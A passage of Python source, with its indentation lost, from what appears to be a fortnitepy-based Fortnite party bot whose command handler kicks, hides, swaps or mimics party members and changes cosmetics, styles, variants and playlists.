await reply(message, client, l('already_party_leader'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_promoting_party_leader'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['kick']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['kick']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(member.display_name): member for member in client.party.members if content_ in jaconv.kata2hira(str(member.display_name).lower())}
else:
users = {str(member.display_name): member for member in client.party.members if content_ in str(member.display_name)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.party.get_member(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
await member.kick()
await reply(message, client, l('kick_user', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
await member.kick()
await reply(message, client, l('kick_user', f'{name(user)}'))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('cant_kick_yourself'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_kicking_user'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_kick_user')}"
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('cant_kick_yourself'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_kicking_user'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['hide']:
try:
if rawcontent == '':
await client.hide()
await reply(message, client, l('hide_all_user'))
else:
if data['caseinsensitive']:
users = {str(member.display_name): member for member in client.party.members if content_ in jaconv.kata2hira(str(member.display_name).lower())}
else:
users = {str(member.display_name): member for member in client.party.members if content_ in str(member.display_name)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.party.get_member(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
await client.hide(member.id)
await reply(message, client, l('hide_user', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
await client.hide(member.id)
await reply(message, client, l('hide_user', f'{name(user)}'))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_not_in_party'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_hide_user')}"
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_not_in_party'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['show']:
try:
if rawcontent == '':
await client.show()
await reply(message, client, l('show_all_user'))
else:
if data['caseinsensitive']:
users = {str(member.display_name): member for member in client.party.members if content_ in jaconv.kata2hira(str(member.display_name).lower())}
else:
users = {str(member.display_name): member for member in client.party.members if content_ in str(member.display_name)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.party.get_member(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
await client.show(member.id)
await reply(message, client, l('show_user', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
await client.show(member.id)
await reply(message, client, l('show_user', f'{name(user)}'))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_not_in_party'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_show_user')}"
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_not_in_party'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['ready']:
try:
await client.party.me.set_ready(fortnitepy.ReadyState.READY)
await reply(message, client, l('set_to', l('readystate'), l('ready')))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['unready']:
try:
await client.party.me.set_ready(fortnitepy.ReadyState.NOT_READY)
await reply(message, client, l('set_to', l('readystate'), l('unready')))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['sitout']:
try:
await client.party.me.set_ready(fortnitepy.ReadyState.SITTING_OUT)
await reply(message, client, l('set_to', l('readystate'), l('sitout')))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['match']:
try:
await client.party.me.set_in_match(players_left=int(args[1]) if args[1:2] else 100)
await reply(message, client, l('set_to', l('matchstate'), l('remaining', args[1] if args[1:2] else "100")))
except ValueError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('remaining_must_be_between_0_and_255'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['unmatch']:
try:
await client.party.me.clear_in_match()
await reply(message, client, l('set_to', l('matchstate'), l('off')))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['swap']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['swap']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(member.display_name): member for member in client.party.members if content_ in jaconv.kata2hira(str(member.display_name).lower())}
else:
users = {str(member.display_name): member for member in client.party.members if content_ in str(member.display_name)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.party.get_member(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
real_members = client.party.meta.squad_assignments
assignments = client.visual_members
await member.swap_position()
await reply(message, client, l('swap_user', f'{name(user)}'))
if client.party.me.leader:
await asyncio.sleep(0.5)
prop = client.party.meta.set_squad_assignments(assignments)
await client.party.patch(updated=prop)
await asyncio.sleep(2)
client.party.meta.set_squad_assignments(real_members)
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
real_members = client.party.meta.squad_assignments
assignments = client.visual_members
await member.swap_position()
await reply(message, client, l('swap_user', f'{name(user)}}'))
if client.party.me.leader:
await asyncio.sleep(0.5)
prop = client.party.meta.set_squad_assignments(assignments)
await client.party.patch(updated=prop)
client.party.meta.set_squad_assignments(real_members)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_swapping_user'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_swap_user')}"
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_swapping_user'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['stop']:
try:
client.stopcheck = True
if await client.change_asset(message.author.id, "Emote", ""):
await reply(message, client, l('stopped'))
else:
await reply(message, client, l('locked'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['setenlightenment']:
try:
if await client.change_asset(message.author.id, "Outfit", client.party.me.outfit, client.party.me.outfit_variants,(args[1],args[2])) is True:
await reply(message, client, l('set_to', 'enlightenment', f'{args[1]}, {args[2]}'))
else:
await reply(message, client, l('locked'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['setenlightenment']}] [{l('number')}] [{l('number')}]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['addeditems']:
try:
async with aiohttp.ClientSession() as session:
res = await session.get("https://benbotfn.tk/api/v1/newCosmetics")
res = await res.json()
flag = False
items = res["items"]
for item in items:
if client.stopcheck:
client.stopcheck = False
break
if item["backendType"] in ignoretype:
continue
if await client.change_asset(message.author.id, convert_backend_type(item["backendType"]), item["id"]):
if data['loglevel'] == 'normal':
await reply(message, client, f"{item['shortDescription']}: {item['name']}")
else:
await reply(message, client, f"{item['shortDescription']}: {item['name']} | {item['id']}")
await asyncio.sleep(5)
else:
await reply(message, client, l('all_end', l('addeditem')))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['shopitems']:
try:
store = await client.fetch_item_shop()
items = []
for item in (store.featured_items
+ store.daily_items
+ store.special_featured_items
+ store.special_daily_items):
for grant in item.grants:
if convert_backend_type(grant["type"]) in ignoretype:
continue
item = {
"id": grant["asset"],
"type": convert_to_asset(convert_to_old_type(convert_backend_type(grant["type"]))),
"backendType": grant["type"]
}
items.append(item)
for item in items:
if client.stopcheck:
client.stopcheck = False
break
if item["backendType"] in ignoretype:
continue
if await client.change_asset(message.author.id, convert_backend_type(item["backendType"]), item["id"]):
i = await loop.run_in_executor(None,search_item,data["search-lang"],"id",item["id"],convert_backend_type(item["backendType"]))
if i:
i = i[0]
if data['loglevel'] == 'normal':
await reply(message, client, f"{i['shortDescription']}: {i['name']}")
else:
await reply(message, client, f"{i['shortDescription']}: {i['name']} | {i['id']}")
else:
await reply(message, client, item["id"])
await asyncio.sleep(5)
else:
await reply(message, client, l('all_end', l('shopitem')))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif True in [args[0] in commands[key] for key in ("alloutfit", "allbackpack", "allpet", "allpickaxe", "allemote", "allemoji", "alltoy")]:
type_ = convert_to_type(args[0])
try:
if getattr(client,f"{convert_to_old_type(type_)}lock") and client.lock_check(message.author.id):
await reply(message, client, l('locked'))
return
with open(f'items/{type_}_{data["search-lang"]}.json', 'r', encoding='utf-8') as f:
allitem = json.load(f)
for item in allitem:
if client.stopcheck:
client.stopcheck = False
break
await client.change_asset(message.author.id, type_, item["id"])
await asyncio.sleep(2)
else:
await reply(message, client, l('all_end', l(convert_to_old_type(type_))))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif True in [args[0] in commands[key] for key in ("cid", "bid", "petcarrier", "pickaxe_id", "eid", "emoji_id", "toy_id", "id")]:
type_ = convert_to_type(args[0])
if rawcontent == '':
await reply(message, client, f"[{commands[convert_to_old_type(type_)]}] [ID]")
return
try:
result = await loop.run_in_executor(None, search_item, data["search-lang"], "id", rawcontent, type_)
if result is None and data["sub-search-lang"] != data["search-lang"]:
result = await loop.run_in_executor(None, search_item, data["sub-search-lang"], "id", rawcontent, type_)
if result is None:
await reply(message, client, l('item_notfound'))
else:
if len(result) > search_max:
await reply(message, client, l('too_many_items', str(len(result))))
return
if len(result) == 1:
if await client.change_asset(message.author.id, convert_backend_type(result[0]['backendType']), result[0]['id']) is True:
if data['loglevel'] == 'normal':
await reply(message, client, f"{result[0]['shortDescription']}: {result[0]['name']}")
else:
await reply(message, client, f"{result[0]['shortDescription']}: {result[0]['name']} | {result[0]['id']}")
else:
await reply(message, client, l('locked'))
else:
text = str()
for count, item in enumerate(result):
if data['loglevel'] == 'normal':
text += f"\n{count+1} {item['shortDescription']}: {item['name']}"
else:
text += f"\n{count+1} {item['shortDescription']}: {item['name']} | {item['id']}"
text += f"\n{l('enter_to_change_asset')}"
await reply(message, client, text)
client.select[message.author.id] = {
"exec": [
"""\
if await client.change_asset(message.author.id, convert_backend_type(item['backendType']), item['id']) is True:
if data['loglevel'] == 'normal':
await reply(message, client, f"{item['shortDescription']}: {item['name']}")
else:
await reply(message, client, f"{item['shortDescription']}: {item['name']} | {item['id']}")
else:
await reply(message, client, l('locked'))""" for item in result
],
"variable": [
{"item": item} for item in result
]
}
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif True in [args[0] in commands[key] for key in ("outfit", "backpack", "pet", "pickaxe", "emote", "emoji", "toy", "item")]:
type_ = convert_to_type(args[0])
if rawcontent == '':
await reply(message, client, f"[{commands[convert_to_old_type(type_)]}] [{l('itemname')}]")
return
try:
result = await loop.run_in_executor(None, search_item, data["search-lang"], "name", rawcontent, type_)
if result is None and data["sub-search-lang"] != data["search-lang"]:
result = await loop.run_in_executor(None, search_item, data["sub-search-lang"], "name", rawcontent, type_)
if result is None:
await reply(message, client, l('item_notfound'))
else:
if len(result) > search_max:
await reply(message, client, l('too_many_items', str(len(result))))
return
if len(result) == 1:
if await client.change_asset(message.author.id, convert_backend_type(result[0]['backendType']), result[0]['id']) is True:
if data['loglevel'] == 'normal':
await reply(message, client, f"{result[0]['shortDescription']}: {result[0]['name']}")
else:
await reply(message, client, f"{result[0]['shortDescription']}: {result[0]['name']} | {result[0]['id']}")
else:
await reply(message, client, l('locked'))
else:
text = str()
for count, item in enumerate(result):
if data['loglevel'] == 'normal':
text += f"\n{count+1} {item['shortDescription']}: {item['name']}"
else:
text += f"\n{count+1} {item['shortDescription']}: {item['name']} | {item['id']}"
text += f"\n{l('enter_to_change_asset')}"
await reply(message, client, text)
client.select[message.author.id] = {
"exec": [
"""\
if await client.change_asset(message.author.id, convert_backend_type(item['backendType']), item['id']) is True:
if data['loglevel'] == 'normal':
await reply(message, client, f"{item['shortDescription']}: {item['name']}")
else:
await reply(message, client, f"{item['shortDescription']}: {item['name']} | {item['id']}")
else:
await reply(message, client, l('locked'))""" for item in result
],
"variable": [
{"item": item} for item in result
]
}
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['set']:
if rawcontent == '':
await reply(message, client, f"[{commands['set']}] [{l('setname')}]")
return
try:
result = await loop.run_in_executor(None, search_item, data["search-lang"], "set", rawcontent)
if result is None and data["sub-search-lang"] != data["search-lang"]:
result = await loop.run_in_executor(None, search_item, data["sub-search-lang"], "set", rawcontent)
if result is None:
await reply(message, client, l('item_notfound'))
else:
if len(result) > search_max:
await reply(message, client, l('too_many_items', str(len(result))))
return
if len(result) == 1:
if await client.change_asset(message.author.id, convert_backend_type(result[0]["backendType"]), result[0]['id']) is True:
if data['loglevel'] == 'normal':
await reply(message, client, f"{result[0]['shortDescription']}: {result[0]['name']} | {result[0]['set']}")
else:
await reply(message, client, f"{result[0]['shortDescription']}: {result[0]['name']} | {result[0]['id']}({result[0]['set']})")
else:
await reply(message, client, l('locked'))
else:
text = str()
for count, item in enumerate(result):
if data['loglevel'] == 'normal':
text += f"\n{count+1} {item['shortDescription']}: {item['name']} | {result[0]['set']}"
else:
text += f"\n{count+1} {item['shortDescription']}: {item['name']} | {item['id']}({result[0]['set']})"
text += f"\n{l('enter_to_change_asset')}"
await reply(message, client, text)
client.select[message.author.id] = {
"exec": [
"""\
if await client.change_asset(message.author.id, convert_backend_type(item["backendType"]), item['id']) is True:
if data['loglevel'] == 'normal':
await reply(message, client, f"{item['shortDescription']}: {item['name']} | {item['set']}")
else:
await reply(message, client, f"{item['shortDescription']}: {item['name']} | {item['id']}({item['set']})")
else:
await reply(message, client, l('locked'))""" for item in result
],
"variable": [
{
"item": item
} for item in result
]
}
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['setstyle']:
try:
if True not in [args[1] in commands[key] for key in ("outfit", "backpack", "pickaxe")]:
await reply(message, client, f"[{commands['setstyle']}] [[{commands['outfit']}] / [{commands['backpack']}] / [{commands['pickaxe']}]]")
return
type_ = convert_to_asset(args[1])
id_ = member_asset(client.party.me, type_)
type_ = convert_to_new_type(type_)
if type_ == "Back Bling" and (id_.startswith("pet_carrier_") or id_.startswith("pet_")):
type_ = "Pet"
result = await loop.run_in_executor(None, search_style, data["search-lang"], id_, type_)
if result is None:
await reply(message, client, l('no_stylechange'))
else:
text = str()
for count, item in enumerate(result):
text += f"\n{count+1} {item['name']}"
text += f"\n{l('enter_to_set_style')}"
await reply(message, client, text)
client.select[message.author.id] = {"exec": [f"await client.change_asset('{message.author.id}', '{type_}', '{id_}', {variants['variants']})" for variants in result]}
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['setstyle']}] [[{commands['outfit']}] / [{commands['backpack']}] / [{commands['pet']}] / [{commands['pickaxe']}]]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['addstyle']:
try:
if True not in [args[1] in commands[key] for key in ("outfit", "backpack", "pickaxe")]:
await reply(message, client, f"[{commands['addstyle']}] [[{commands['outfit']}] / [{commands['backpack']}] / [{commands['pickaxe']}]]")
return
type_ = convert_to_asset(args[1])
id_ = member_asset(client.party.me, type_)
variants_ = eval(f"client.party.me.{type_}_variants")
type_ = convert_to_new_type(type_)
if type_ == "Back Bling" and (id_.startswith("pet_carrier_") or id_.startswith("pet_")):
type_ = "Pet"
result = await loop.run_in_executor(None, search_style, data["search-lang"], id_, type_)
if result is None:
await reply(message, client, l('no_stylechange'))
else:
text = str()
for count, item in enumerate(result):
text += f"\n{count+1} {item['name']}"
text += f"\n{l('enter_to_set_style')}"
await reply(message, client, text)
client.select[message.author.id] = {"exec": [f"await client.change_asset('{message.author.id}', '{type_}', '{id_}', {variants_} + {variants['variants']})" for variants in result]}
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['addstyle']}] [[{commands['outfit']}] / [{commands['backpack']}] / [{commands['pet']}] / [{commands['pickaxe']}]]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['setvariant']:
try:
if True not in [args[1] in commands[key] for key in ("outfit", "backpack", "pet", "pickaxe")]:
await reply(message, client, f"[{commands['setvariant']}] [[{commands['outfit']}] / [{commands['backpack']}] / [{commands['pet']}] / [{commands['pickaxe']}]]")
return
variantdict={}
for count,text in enumerate(args[2:]):
if count % 2 != 0:
continue
try:
variantdict[text]=args[count+3]
except IndexError:
break
type_ = convert_to_type(args[1])
id_ = member_asset(client.party.me, convert_to_asset(args[1]))
variants = client.party.me.create_variants(item='AthenaCharacter', **variantdict)
type_ = convert_to_new_type(type_)
if type_ == "Back Bling" and (id_.startswith("pet_carrier_") or id_.startswith("pet_")):
type_ = "Pet"
if await client.change_asset(message.author.id, type_, id_, variants, client.party.me.enlightenments) is False:
await reply(message, client, l('locked'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['setvariant']}] [ID] [variant] [{l('number')}]")
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['addvariant']:
try:
if True not in [args[1] in commands[key] for key in ("outfit", "backpack", "pet", "pickaxe")]:
await reply(message, client, f"[{commands['addvariant']}] [[{commands['outfit']}] / [{commands['backpack']}] / [{commands['pet']}] / [{commands['pickaxe']}]]")
return
variantdict={}
for count,text in enumerate(args[2:]):
if count % 2 != 0:
continue
try:
variantdict[text]=args[count+3]
except IndexError:
break
type_ = convert_to_type(args[1])
id_ = member_asset(client.party.me, convert_to_asset(args[1]))
variants = client.party.me.create_variants(item='AthenaCharacter', **variantdict)
variants += eval(f"client.party.me.{convert_to_asset(args[1])}_variants")
type_ = convert_to_new_type(type_)
if type_ == "Back Bling" and (id_.startswith("pet_carrier_") or id_.startswith("pet_")):
type_ = "Pet"
if await client.change_asset(message.author.id, type_, id_, variants, client.party.me.enlightenments) is False:
await reply(message, client, l('locked'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['addvariant']}] [ID] [variant] [{l('number')}]")
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif True in [args[0].lower().startswith(id_) for id_ in ("cid_", "bid_", "petcarrier_", "pickaxe_id_", "eid_", "emoji_", "toy_")]:
try:
type_ = convert_to_type(args[0])
if not await client.change_asset(message.author.id, type_, args[0]):
await reply(message, client, l('locked'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0].lower().startswith('playlist_'):
try:
await client.party.set_playlist(args[0])
await reply(message, client, l('set_playlist', args[0]))
data['fortnite']['playlist']=args[0]
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
else:
keys = {
"outfitmimic": ["outfitmimic", l('mimic', l("outfit"))],
"backpackmimic": ["backpackmimic", l('mimic', l("backpack"))],
"pickaxemimic": ["pickaxemimic", l('mimic', l("pickaxe"))],
"emotemimic": ["emotemimic", l('mimic', l("emote"))]
}
for key,value in keys.items():
if args[0] in commands[key]:
try:
if args[1] in commands['true']:
setattr(client,value[0],True)
send(display_name,l('set_to', value[1], l('on')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('set_to', value[1], l('on')))
elif args[1] in commands['false']:
setattr(client,value[0],False)
send(display_name,l('set_to', value[1], l('off')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('set_to', value[1], l('off')))
else:
if data['caseinsensitive']:
users = {str(user.display_name): user for user in client.party.members if content_ in jaconv.kata2hira(str(user.display_name).lower())}
else:
users = {str(user.display_name): user for user in client.party.members if content_ in str(user.display_name)}
try:
user = await client.fetch_user(rawcontent)
if user:
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
setattr(client,value[0],user.id)
send(display_name,l('set_to', value[1], l('off')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('set_to', value[1], name(user)))
else:
client.select[message.author.id] = {
"exec": [
"""\
setattr(client,value[0],user.id)
send(display_name,l('set_to', value[1], l('off')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('set_to', value[1], name(user)))""" for user in users.values()
],
"variable": [
{"user": user, "value": value} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_mimic_user')}"
await reply(message, client, text)
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands[key]}] [[{commands['true']}] / [{commands['false']}] / {l('name_or_id')}]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
return
keys = {
"outfitlock": ["outfitlock", l('lock', l("outfit"))],
"backpacklock": ["backpacklock", l('lock', l("backpack"))],
"pickaxelock": ["pickaxelock", l('lock', l("pickaxe"))],
"emotelock": ["emotelock", l('lock', l("emote"))],
"whisper": ["whisper", l('command_from', l('whisper'))],
"partychat": ["partychat", l('command_from', l('partychat'))],
"discord": ["discord", l('command_from', l('discord'))],
"web": ["web", l('command_from', l('web'))],
"disablewhisperperfectly": ["whisperperfect", l('disable_perfect', l('whisper'))],
"disablepartychatperfectly": ["partychatperfect", l('disable_perfect', l('partychat'))],
"disablediscordperfectly": ["discordperfect", l('disable_perfect', l('discord'))],
"acceptinvite": ["acceptinvite", l('invite')],
"acceptfriend": ["acceptfriend", l('friend_request')],
